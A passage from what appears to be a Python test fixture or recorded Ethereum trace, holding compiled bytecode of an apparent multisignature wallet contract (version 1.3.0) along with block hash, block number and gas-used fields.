0381600087803b158015612f9357600080fd5b505af1158015612fa7573d6000803e3d6000fd5b505050505b6101f4612fd36109c48b01603f60408d0281612fc457fe5b04614f0a90919063ffffffff16565b015a1015613049576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330313000000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b60005a90506130b28f8f8f8f8080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f820116905080830192505050505050508e60008d146130a7578e6130ad565b6109c45a035b614e8d565b93506130c75a82614f2490919063ffffffff16565b905083806130d6575060008a14155b806130e2575060008814155b613154576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330313300000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b60008089111561316e5761316b828b8b8b8b614f44565b90505b84156131b8577f442e715f626346e8c54381002da614f62bee8d27386535b2521ec8540898556e8482604051808381526020018281526020019250505060405180910390a16131f8565b7f23428b18acfb3ea64b08dc0c1d296ea9c09702c09083ca5272e64d115b687d238482604051808381526020018281526020019250505060405180910390a15b5050600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16146132a4578073ffffffffffffffffffffffffffffffffffffffff16639327136883856040518363ffffffff1660e01b815260040180838152602001821515815260200192505050600060405180830381600087803b15801561328b57600080fd5b505af115801561329f573d6000803e3d6000fd5b505050505b50509b9a5050505050505050505050565b6008602052816000526040600020602052806000526040600020600091509150505481565b6000600454905060008111613357576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330303100000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b61336384848484611bbe565b50505050565b6060600060035467ffffffffffffffff8111801561338657600080fd5b506040519080825280602002602001820160405280156133b55781602001602082028036833780820191505090505b50905060008060026000600173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690505b600173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614613509578083838151811061346057fe5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600260008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050818060010192505061341f565b82935050505090565b60055481565b600080825160208401855af4806000523d6020523d600060403e60403d016000fd5b6135858a8a80806020026020016040519081016040528093929190818152602001838360200280828437600081840152601f19601f820116905080830192505050505050508961514a565b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16146135c3576135c28461564a565b5b6136118787878080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f82011690508083019250505050505050615679565b600082111561362b5761362982600060018685614f44565b505b3373ffffffffffffffffffffffffffffffffffffffff167f141df868a6331af528e38c83b7aa03edc19be66e37ae67f9285bf4f8e3c6a1a88b8b8b8b8960405180806020018581526020018473ffffffffffffffffffffffffffffffffffffffff1681526020018373ffffffffffffffffffffffffffffffffffffffff1681526020018281038252878782818152602001925060200280828437600081840152601f19601f820116905080830192505050965050505050505060405180910390a250505050505050505050565b6000805a905061374f878787878080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f82011690508083019250505050505050865a614e8d565b61375857600080fd5b60005a8203905080604051602001808281526020019150506040516020818303038152906040526040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825283818151815260200191508051906020019080838360005b838110156137e55780820151818401526020810190506137ca565b50505050905090810190601f1680156138125780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b606060008267ffffffffffffffff8111801561383b57600080fd5b5060405190808252806020026020018201604052801561386a5781602001602082028036833780820191505090505b509150600080600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690505b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415801561393d5750600173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614155b801561394857508482105b15613a03578084838151811061395a57fe5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600160008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081806001019250506138d3565b80925081845250509250929050565b600073ffffffffffffffffffffffffffffffffffffffff16600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161415613b14576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330333000000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b6001600860003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000838152602001908152602001600020819055503373ffffffffffffffffffffffffffffffffffffffff16817ff2a0eb156472d1440255b0d7c1e19cc07115d1051fe605b0dce69acfec884d9c60405160405180910390a350565b6000613bc68c8c8c8c8c8c8c8c8c8c8c61466f565b8051906020012090509b9a5050505050505050505050565b613be6614d62565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614158015613c505750600173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614155b613cc2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475331303100000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614613dc2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475331303300000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600160008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055507faab4fa2b463f581b2b32cb3b7e3b704b9ce37cc209b5fb4d77e593ace405427681604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390a15050565b613f77614d62565b60007f4a204f620c8c5ccdca3fd54d003badd85ba500436a431f0cbda4f558c93c34c860001b90508181557f1151116914515bc0891ff9047a6cb32cf902546f83066499bcf8ba33d2353fa282604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390a15050565b613ffb614d62565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16141580156140655750600173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614155b801561409d57503073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614155b61410f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303300000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614614210576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303400000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415801561427a5750600173ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b6142ec576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303300000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b8173ffffffffffffffffffffffffffffffffffffffff16600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146143ec576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303500000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555080600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055507ff8d49fc529812e9a7c5c50e69c20f0dccc0db8fa95c98bc58cc9a4f1c1299eaf82604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390a17f9465fa0c962cc76958e6373a993326400c1c94f8be2fe3a952adfa7f60b2ea2681604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390a1505050565b6000600454905090565b606060007fbb8310d486368db6bd6f849402fdd73ad53d316b5a4b2644ad6efe0f941286d860001b8d8d8d8d60405180838380828437808301925050509250505060405180910390208c8c8c8c8c8c8c604051602001808c81526020018b73ffffffffffffffffffffffffffffffffffffffff1681526020018a815260200189815260200188600181111561470057fe5b81526020018781526020018681526020018581526020018473ffffffffffffffffffffffffffffffffffffffff1681526020018373ffffffffffffffffffffffffffffffffffffffff1681526020018281526020019b505050505050505050505050604051602081830303815290604052805190602001209050601960f81b600160f81b61478c614878565b8360405160200180857effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff19168152600101847effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff191681526001018381526020018281526020019450505050506040516020818303038152906040529150509b9a5050505050505050505050565b61481f614d62565b6148288161564a565b7f5ac6c46c93c8d0e53714ba3b53db3e7c046da994313d7ed0d192028bc7c228b081604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390a150565b60007f47e79534a245952e8b16893a336b85a3d9ea9fa8c573f3d803afb92a7946921860001b6148a66125e4565b30604051602001808481526020018381526020018273ffffffffffffffffffffffffffffffffffffffff168152602001935050505060405160208183030381529060405280519060200120905090565b6148fe614d62565b806001600354031015614979576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303100000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141580156149e35750600173ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b614a55576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303300000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b8173ffffffffffffffffffffffffffffffffffffffff16600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614614b55576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303500000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600360008154809291906001900391905055507ff8d49fc529812e9a7c5c50e69c20f0dccc0db8fa95c98bc58cc9a4f1c1299eaf82604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390a18060045414614d2457614d2381612c3e565b5b505050565b6040518060400160405280600581526020017f312e332e3000000000000000000000000000000000000000000000000000000081525081565b3073ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614614e03576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330333100000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b565b600080831415614e185760009050614e39565b6000828402905082848281614e2957fe5b0414614e3457600080fd5b809150505b92915050565b60008060008360410260208101860151925060408101860151915060ff60418201870151169350509250925092565b600080828401905083811015614e8357600080fd5b8091505092915050565b6000600180811115614e9b57fe5b836001811115614ea757fe5b1415614ec0576000808551602087018986f49050614ed0565b600080855160208701888a87f190505b95945050505050565b6000807f4a204f620c8c5ccdca3fd54d003badd85ba500436a431f0cbda4f558c93c34c860001b9050805491505090565b600081831015614f1a5781614f1c565b825b905092915050565b600082821115614f3357600080fd5b600082840390508091505092915050565b600080600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614614f815782614f83565b325b9050600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16141561509b57614fed3a8610614fca573a614fcc565b855b614fdf888a614e6e90919063ffffffff16565b614e0590919063ffffffff16565b91508073ffffffffffffffffffffffffffffffffffffffff166108fc839081150290604051600060405180830381858888f19350505050615096576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330313100000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b615140565b6150c0856150b2888a614e6e90919063ffffffff16565b614e0590919063ffffffff16565b91506150cd8482846158b4565b61513f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330313200000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b5b5095945050505050565b6000600454146151c2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303000000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b8151811115615239576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303100000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b60018110156152b0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303200000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b60006001905060005b83518110156155b65760008482815181106152d057fe5b60200260200101519050600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16141580156153445750600173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614155b801561537c57503073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614155b80156153b457508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b615426576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303300000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614615527576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303400000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508092505080806001019150506152b9565b506001600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550825160038190555081600481905550505050565b60007f6c9a6c4a39284e37ed1cf53d337577d14212a4870fb976a4366c693b939918d560001b90508181555050565b600073ffffffffffffffffffffffffffffffffffffffff1660016000600173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461577b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475331303000000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b6001806000600173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16146158b05761583d8260008360015a614e8d565b6158af576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330303000000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b5b5050565b60008063a9059cbb8484604051602401808373ffffffffffffffffffffffffffffffffffffffff168152602001828152602001925050506040516020818303038152906040529060e01b6020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff83818316178352505050509050602060008251602084016000896127105a03f13d6000811461595b5760208114615963576000935061596e565b81935061596e565b600051158215171593505b505050939250505056fea26469706673582212203874bcf92e1722cc7bfa0cef1a0985cf0dc3485ba0663db3747ccdf1605df53464736f6c63430007060033"
),
},
"blockHash": "0x4160d3b92f3678386a108e0838016dd3010ba12389712a30f2b017d33799d05e",
"blockNumber": 12504268,
"result": {
"gasUsed": 4619079,
"code": HexBytes(
"0x6080604052600436106101dc5760003560e01c8063affed0e011610102578063e19a9dd911610095578063f08a032311610064578063f08a032314611647578063f698da2514611698578063f8dc5dd9146116c3578063ffa1ad741461173e57610231565b8063e19a9dd91461139b578063e318b52b146113ec578063e75235b81461147d578063e86637db146114a857610231565b8063cc2f8452116100d1578063cc2f8452146110e8578063d4d9bdcd146111b5578063d8d11f78146111f0578063e009cfde1461132a57610231565b8063affed0e014610d94578063b4faba0914610dbf578063b63e800d14610ea7578063c4ca3a9c1461101757610231565b80635624b25b1161017a5780636a761202116101495780636a761202146109945780637d83297414610b50578063934f3a1114610bbf578063a0e67e2b14610d2857610231565b80635624b25b146107fb5780635ae6bd37146108b9578063610b592514610908578063694e80c31461095957610231565b80632f54bf6e116101b65780632f54bf6e146104d35780633408e4701461053a578063468721a7146105655780635229073f1461067a57610231565b80630d582f131461029e57806312fb68e0146102f95780632d9ad53d1461046c57610231565b36610231573373ffffffffffffffffffffffffffffffffffffffff167f3d0ce9bfc3ed7d6862dbb28b2dea94561fe714a1b4d019aa8af39730d1ad7c3d346040518082815260200191505060405180910390a2005b34801561023d57600080fd5b5060007f6c9a6c4a39284e37ed1cf53d337577d14212a4870fb976a4366c693b939918d560001b905080548061027257600080f35b36600080373360601b365260008060143601600080855af13d6000803e80610299573d6000fd5b3d6000f35b3480156102aa57600080fd5b506102f7600480360360408110156102c157600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506117ce565b005b34801561030557600080fd5b5061046a6004803603608081101561031c57600080fd5b81019080803590602001909291908035906020019064010000000081111561034357600080fd5b82018360208201111561035557600080fd5b8035906020019184600183028401116401000000008311171561037757600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f820116905080830192505050505050509192919290803590602001906401000000008111156103da57600080fd5b8201836020820111156103ec57600080fd5b8035906020019184600183028401116401000000008311171561040e57600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f82011690508083019250505050505050919291929080359060200190929190505050611bbe565b005b34801561047857600080fd5b506104bb6004803603602081101561048f57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050612440565b60405180821515815260200191505060405180910390f35b3480156104df57600080fd5b50610522600480360360208110156104f657600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050612512565b60405180821515815260200191505060405180910390f35b34801561054657600080fd5b5061054f6125e4565b6040518082815260200191505060405180910390f35b34801561057157600080fd5b506106626004803603608081101561058857600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190803590602001906401000000008111156105cf57600080fd5b8201836020820111156105e157600080fd5b8035906020019184600183028401116401000000008311171561060357600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f820116905080830192505050505050509192919290803560ff1690602001909291905050506125f1565b60405180821515815260200191505060405180910390f35b34801561068657600080fd5b506107776004803603608081101561069d57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190803590602001906401000000008111156106e457600080fd5b8201836020820111156106f657600080fd5b8035906020019184600183028401116401000000008311171561071857600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f820116905080830192505050505050509192919290803560ff1690602001909291905050506127d7565b60405180831515815260200180602001828103825283818151815260200191508051906020019080838360005b838110156107bf5780820151818401526020810190506107a4565b50505050905090810190601f1680156107ec5780820380516001836020036101000a031916815260200191505b50935050505060405180910390f35b34801561080757600080fd5b5061083e6004803603604081101561081e57600080fd5b81019080803590602001909291908035906020019092919050505061280d565b6040518080602001828103825283818151815260200191508051906020019080838360005b8381101561087e578082015181840152602081019050610863565b50505050905090810190601f1680156108ab5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b3480156108c557600080fd5b506108f2600480360360208110156108dc57600080fd5b8101908080359060200190929190505050612894565b6040518082815260200191505060405180910390f35b34801561091457600080fd5b506109576004803603602081101561092b57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291905050506128ac565b005b34801561096557600080fd5b506109926004803603602081101561097c57600080fd5b8101908080359060200190929190505050612c3e565b005b610b3860048036036101408110156109ab57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190803590602001906401000000008111156109f257600080fd5b820183602082011115610a0457600080fd5b80359060200191846001830284011164010000000083111715610a2657600080fd5b9091929391929390803560ff169060200190929190803590602001909291908035906020019092919080359060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190640100000000811115610ab257600080fd5b820183602082011115610ac457600080fd5b80359060200191846001830284011164010000000083111715610ae657600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f820116905080830192505050505050509192919290505050612d78565b60405180821515815260200191505060405180910390f35b348015610b5c57600080fd5b50610ba960048036036040811015610b7357600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506132b5565b6040518082815260200191505060405180910390f35b348015610bcb57600080fd5b50610d2660048036036060811015610be257600080fd5b810190808035906020019092919080359060200190640100000000811115610c0957600080fd5b820183602082011115610c1b57600080fd5b80359060200191846001830284011164010000000083111715610c3d57600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f82011690508083019250505050505050919291929080359060200190640100000000811115610ca057600080fd5b820183602082011115610cb257600080fd5b80359060200191846001830284011164010000000083111715610cd457600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f8201169050808301925050505050505091929192905050506132da565b005b348015610d3457600080fd5b50610d3d613369565b6040518080602001828103825283818151815260200191508051906020019060200280838360005b83811015610d80578082015181840152602081019050610d65565b505050509050019250505060405180910390f35b348015610da057600080fd5b50610da9613512565b6040518082815260200191505060405180910390f35b348015610dcb57600080fd5b50610ea560048036036040811015610de257600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190640100000000811115610e1f57600080fd5b820183602082011115610e3157600080fd5b80359060200191846001830284011164010000000083111715610e5357600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f820116905080830192505050505050509192919290505050613518565b005b348015610eb357600080fd5b506110156004803603610100811015610ecb57600080fd5b8101908080359060200190640100000000811115610ee857600080fd5b820183602082011115610efa57600080fd5b80359060200191846020830284011164010000000083111715610f1c57600080fd5b909192939192939080359060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190640100000000811115610f6757600080fd5b820183602082011115610f7957600080fd5b80359060200191846001830284011164010000000083111715610f9b57600080fd5b9091929391929390803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919050505061353a565b005b34801561102357600080fd5b506110d26004803603608081101561103a57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291908035906020019064010000000081111561108157600080fd5b82018360208201111561109357600080fd5b803590602001918460018302840111640100000000831117156110b557600080fd5b9091929391929390803560ff1690602001909291905050506136f8565b6040518082815260200191505060405180910390f35b3480156110f457600080fd5b506111416004803603604081101561110b57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050613820565b60405180806020018373ffffffffffffffffffffffffffffffffffffffff168152602001828103825284818151815260200191508051906020019060200280838360005b838110156111a0578082015181840152602081019050611185565b50505050905001935050505060405180910390f35b3480156111c157600080fd5b506111ee600480360360208110156111d857600080fd5b8101908080359060200190929190505050613a12565b005b3480156111fc57600080fd5b50611314600480360361014081101561121457600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291908035906020019064010000000081111561125b57600080fd5b82018360208201111561126d57600080fd5b8035906020019184600183028401116401000000008311171561128f57600080fd5b9091929391929390803560ff169060200190929190803590602001909291908035906020019092919080359060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050613bb1565b6040518082815260200191505060405180910390f35b34801561133657600080fd5b506113996004803603604081101561134d57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050613bde565b005b3480156113a757600080fd5b506113ea600480360360208110156113be57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050613f6f565b005b3480156113f857600080fd5b5061147b6004803603606081101561140f57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050613ff3565b005b34801561148957600080fd5b50611492614665565b6040518082815260200191505060405180910390f35b3480156114b457600080fd5b506115cc60048036036101408110156114cc57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291908035906020019064010000000081111561151357600080fd5b82018360208201111561152557600080fd5b8035906020019184600183028401116401000000008311171561154757600080fd5b9091929391929390803560ff169060200190929190803590602001909291908035906020019092919080359060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff1690602001909291908035906020019092919050505061466f565b6040518080602001828103825283818151815260200191508051906020019080838360005b8381101561160c5780820151818401526020810190506115f1565b50505050905090810190601f1680156116395780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b34801561165357600080fd5b506116966004803603602081101561166a57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050614817565b005b3480156116a457600080fd5b506116ad614878565b6040518082815260200191505060405180910390f35b3480156116cf57600080fd5b5061173c600480360360608110156116e657600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506148f6565b005b34801561174a57600080fd5b50611753614d29565b6040518080602001828103825283818151815260200191508051906020019080838360005b83811015611793578082015181840152602081019050611778565b50505050905090810190601f1680156117c05780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6117d6614d62565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141580156118405750600173ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b801561187857503073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b6118ea576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303300000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b